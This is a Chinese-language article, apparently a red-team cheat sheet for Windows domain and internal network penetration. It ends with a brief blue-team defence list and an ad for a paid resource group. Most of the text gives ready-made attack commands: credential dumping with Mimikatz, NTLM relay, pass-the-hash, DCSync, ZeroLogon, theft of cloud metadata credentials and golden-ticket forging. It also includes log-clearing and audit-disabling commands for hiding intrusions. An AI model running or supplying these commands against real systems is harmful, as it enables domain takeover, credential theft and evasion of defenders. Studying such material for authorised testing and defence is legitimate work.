红队攻防内网渗透
原文链接: https://mp.weixin.qq.com/s?__biz=MjM5OTk4MDE2MA==&mid=2655286418&idx=1&sn=19c59ac91137906ccde3b5156e683303
红队攻防内网渗透
原创 计算机与网络安全 计算机与网络安全 2025-07-10 23:57
红队在内网渗透中的核心目标是模拟高级攻击者,绕过防御体系横向移动,最终夺取关键资产(如域控、数据库、核心业务系统)。
一、前期准备
-
权限维持
-
植入Webshell/内存马(如Godzilla、Behinder)
-
部署隐蔽持久化后门(计划任务、服务、WMI事件订阅)
-
窃取凭据:
Mimikatz
(sekurlsa::logonpasswords)、
LaZagne
- 信息收集
# 网络拓扑
arp -a & route print
# 主机发现
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i | findstr "TTL"
# 域信息
nltest /domain_trusts & net group "Domain Admins" /domain
二、横向移动技术
(1)凭据中继攻击
- NTLM中继(Responder + Impacket)
python ntlmrelayx.py -t ldap://dc01 -smb2support --add-computer
- Kerberos中继(KRB-RELay)
:针对启用RBAC的服务(如Exchange)
(2)利用协议缺陷
-
LLMNR/NBT-NS投毒
:Responder捕获NetNTLMv2哈希 -
AD CS漏洞
(ESC1-ESC11):
certipy req -u [email protected] -p Password1 -target ca.corp.local -template VulnTemplate
(3)Pass-the-Hash/Ticket
- PTH(Windows)
:
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:NT_HASH
-
PTT(Linux):
export KRB5CCNAME=admin.ccache
impacket-psexec domain/admin@dc01 -k -no-pass
三、权限提升路径
-
本地提权
-
利用未修补内核漏洞(CVE-2021-4034, CVE-2022-0847)
-
服务路径劫持:
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
-
域内提权
-
ACL滥用
:
Add-ObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity Attacker -Rights All
-
资源委派攻击
:约束委派->非约束委派黄金票据 -
DCSync
:获取krbtgt哈希
secretsdump.py corp/attacker@dc01 -just-dc
四、绕过防御机制
-
对抗EDR/AV
-
无文件攻击:PowerShell反射加载(
Invoke-ReflectivePEInjection
)
- 进程注入:
Process Hollowing
(合法进程内存替换)
- 签名劫持:利用微软签名的二进制执行代码(如
msbuild.exe
)
-
日志清除
-
清除单条日志:
wevtutil cl Security /r:EventID==4688
- 禁用审计策略:
auditpol /set /category:"Account Logon" /success:disable
五、关键基础设施攻击
-
域控攻陷
-
ZeroLogon
(CVE-2020-1472):
python zerologon_tester.py dc01 192.168.1.10
secretsdump.py -no-pass dc01\[email protected] -just-dc
- PrintNightmare
(CVE-2021-34527):远程加载恶意DLL
2. 云环境渗透
– AWS:通过实例元数据服务窃取IAM角色凭证
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
- Azure:利用Managed Identity滥用RBAC权限
六、痕迹清理与持久化
1. 黄金票据
:
ticketer.py -nthash krbtgt_nt_hash -domain-sid S-1-5-21-... -domain corp.local Administrator
2. DCShadow攻击
:在内存中创建伪造域控同步恶意对象
3. 隐蔽通道
:
1. DNS隧道(dnscat2)
- ICMP封装(ptunnel)
防御建议(蓝队视角)
1. **网络分段**:严格限制VLAN间通信,核心区域仅允许必要端口
2. **凭据防护**:
- 启用LSA保护(RunAsPPL)
- 限制NTLM使用,强制Kerberos AES加密
3. **权限最小化**:
- 禁用域管理员本地登录非域控
- 定期审核ACL(BloodHound扫描)
4. **深度监控**:
- 检测异常Kerberos请求(如4624事件中LogonType=9)
- 监控PsExec/SMBexec的父进程链(通常非explorer.exe启动)
5. **补丁管理**:优先修复ADCS漏洞、Print Spooler漏洞
红队内网渗透本质是权限传递的艺术,需结合漏洞利用、协议滥用、社会工程。蓝队需打破”已授权=可信”的思维,采用零信任架构纵深防御。
完整文件已上传至星球。
近七天上传文件列表
扫码加入知识星球:
网络安全攻防(HVV)
下载本篇和全套资料
HVV(红队蓝队资料、威胁情报、技战法)、渗透测试、漏洞、代码审计、APT、DDOS、勒索病毒、CTF、逆向
|
–